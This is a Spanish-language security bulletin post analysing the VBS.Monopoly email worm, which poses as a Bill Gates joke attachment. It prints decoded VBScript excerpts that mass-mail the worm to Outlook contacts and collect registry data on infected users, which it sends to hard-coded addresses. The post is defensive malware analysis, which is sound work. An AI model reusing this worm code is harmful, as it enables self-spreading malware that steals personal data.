Una al Día

Boletín de noticias de Seguridad Informática ofrecido por Hispasec

You are here: Home / General / Gusano VBS.Monopoly

Gusano VBS.Monopoly

Por Leave a Comment

Outlook.Monopoly, bautizado por las casas antivirus como VBS.Monopoly,
es un gusano escrito en VBScript que utiliza, como lo hiciera Melissa,
el cliente de correo Outlook para adjuntarse a los emails y difundirse.
Hay que destacar en éste espécimen que la mayor parte de su código se
encuentra codificado, por lo que a simple vista puede parecer más
críptico, aunque en realidad su análisis sigue siendo trivial. En
HispaSec, como viene siendo habitual, os describimos el virus
comentando su código en claro como referencia.
El gusano puede llegar al usuario adjunto en un email, el fichero
«MONOPOLY.VBS» vendrá dentro del correo electrónico con el asunto
«Bill Gates joke», y en el cuerpo del mensaje: «Bill Gates is guilty
of monopoly. Here is the proof. :-)»

El usuario, creyendo que se trata de alguna broma con referencias a
Bill Gates, puede ejecutar haciendo doble click el fichero «MONOPOLY.VBS».
En tal caso se crea el fichero «MONOPOLY.JPG», y si la versión de
VBScript es la 5 o superior también crea los ficheros «MONOPOLY.WSH» y
«MONOPOLY.VBE». El fichero con extensión «WSH» se encarga de ejecutar
el cuerpo principal del gusano que se encuentra codificado en
«MONOPOLY.VBE». Si todo ésto se lleva a cabo la aparente broma hará
su aparición mostrando el gráfico JPG, que simula el tablero del
popular juego de mesa Monopoly con la imagen de Bill Gates en el
centro. También aparece el mensaje: «Bill Gates is guilty of monopoly.
Here is the proof.»

A continuación podemos ver la parte del código donde comprueba
mediante una clave del registro si ya había infectado el sistema. En
caso contrario recopila las direcciones de la libreta de contactos de
Outlook para proceder a autoenviarse adjuntándose al email.


Set A1 = CreateObject(«WScript.Shell»)
A2 = A1.RegRead(«HKEY_LOCAL_MACHINE\Software\OUTLOOK.Monopoly\»)
If A2 «True» Then
Set A3 = CreateObject(«Outlook.Application»)
Set A4 = A3.GetNameSpace(«MAPI»)
For Each A5 In A4.AddressLists
If A5.AddressEntries.Count 0 Then
Set A6 = A3.CreateItem(0)
For A7 = 1 To A5.AddressEntries.Count
Set A8 = A5.AddressEntries(A7)
If A7 = 1 Then
A6.BCC = A8.Address

Código del virus donde asigna el asunto del email, el cuerpo del
mensaje, y se autoenvía adjuntándose con el nombre de «MONOPOLY.VBS»


A6.Subject = «Bill Gates joke»
A6.Body = «Bill Gates is guilty of monopoly. Here is the proof. :-)»
Set A9 = CreateObject(«Scripting.FileSystemObject»)
A6.Attachments.Add A9.BuildPath(A9.GetSpecialFolder(2),»MONOPOLY.VBS»)
A6.DeleteAfterSubmit = True
A6.Send

Otro rasgo característico es que el autor parece ser que quiso hacer
de su gusano un recolector de información, o al menos poder seguir la
pista de su difusión. Por ello, el gusano envía un email con información
que recopila de los sistemas infectados.

Código del virus donde se encuentran las direcciones a las que envía
información sobre los sistemas infectados:


A10.BCC = «monopoly@mixmail.com; monpooly@telebot.com; mooponly@ciudad.com.ar; mloponoy@usa.net; yloponom@gnwmail.com»

Porción de código donde se puede apreciar como interroga el registro
de Windows para recoger información del sistema como es el nombre de
usuario, ordenador, organización, fecha, día. El listado es mucho más
extenso y recoge país, código postal, lenguaje, versión de Windows,
número de serie, ficheros del ICQ, direcciones de la libreta de correo
y pagina de inicio del Internet Explorer.

——–
A11 = A1.RegRead(«HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner»)
A10.Subject = «OUTLOOK.Monopoly coming from «»» & A11 & «»»»
A12 = «- Information» & Chr(13) & Chr(10) & Chr(13) & Chr(10) & «Time: «»»
A12 = A12 & Time
A12 = A12 & «»»» & Chr(13) & Chr(10) & «Date: «»»
A12 = A12 & Date
A12 = A12 & «»»» & Chr(13) & Chr(10) & «Name: «»» & A11 & «»»» & Chr(13) & Chr(10) & «Organization: «»»
A12 = A12 & A1.RegRead(«HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization»)
A12 = A12 & «»»» & Chr(13) & Chr(10) & «Network computer name: «»»
Set A13 = Createobject(«WScript.Network»)
A12 = A12 & A13.ComputerName
[…]
——–

Ya se encuentran disponibles las actualizaciones de las principales
casas antivirus que permiten neutralizar éste gusano. Se prevé que no
tenga mayor alcance.

Más información:
Panda Software: http://www.pandasoftware.es/vernoticia.asp?noticia=262&idioma=1
AVP: http://www.kasperskylab.ru/eng/news/press/990809.html
Sophos: http://www.sophos.com/downloads/ide/index.html#monopoly

Bernardo Quintero

Reader Interactions

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.